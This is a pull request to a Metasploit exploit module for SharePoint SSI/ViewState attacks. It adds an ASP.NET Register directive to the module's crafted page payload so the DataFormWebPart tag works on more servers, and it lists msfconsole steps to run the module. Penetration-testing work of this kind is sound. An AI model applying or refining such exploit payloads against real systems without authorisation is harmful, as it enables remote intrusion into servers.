### PR TITLE
Modify ssi_page - fix Unknown server tag 'WebPartPages:DataFormWebPart'

### DIFF
--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -289,6 +289,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def ssi_page
     <<~XML
+      <%@ Register Tagprefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPages" Assembly="Microsoft.SharePoint, Version=14.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
       <WebPartPages:DataFormWebPart runat="server">
       <ParameterBindings>
         <ParameterBinding Name="#{ssi_param}" Location="ServerVariable(HTTP_#{ssi_header})" DefaultValue="" />


### PR DESCRIPTION
Fix Unknown server tag 'WebPartPages:DataFormWebPart' errors

I found this module running in the following error message on some sharepoint servers:

![grafik](https://user-images.githubusercontent.com/27858067/101353249-8f45db00-3893-11eb-8a2c-7275b58647e5.png)

I fixed that by modifying the ssi_page adding the following line

```
<%@ Register Tagprefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPages" Assembly="Microsoft.SharePoint, Version=14.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
```

according to  - https://social.msdn.microsoft.com/Forums/office/en-US/b33813c7-fc38-4d87-8079-3b128c0cc3f7/unknown-server-tag-webpartpageswebpartadder-on-sharepoint-2010-subsites?forum=sharepointdevelopmentprevious

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use windows/http/sharepoint_ssi_viewstate`
- [ ] Set the according options
- [ ] Verify its working
